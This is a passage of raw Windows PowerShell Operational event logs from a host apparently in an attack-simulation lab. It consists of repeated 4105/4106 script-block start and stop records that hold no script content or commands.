Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469188
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469187
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469186
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469185
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469184
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469183
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469182
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469181
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469180
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469179
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469178
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469177
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469176
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469175
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469174
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469173
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469172
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469171
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469170
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469169
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469168
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469167
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469166
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469165
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469164
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469163
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469162
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469161
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469160
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469159
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469158
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469157
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469156
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469155
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469154
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469153
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469152
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469151
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469150
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469149
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469148
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469147
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469146
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469145
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469144
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469143
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469142
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469141
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469140
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469139
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469138
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469137
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469136
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469135
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469134
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
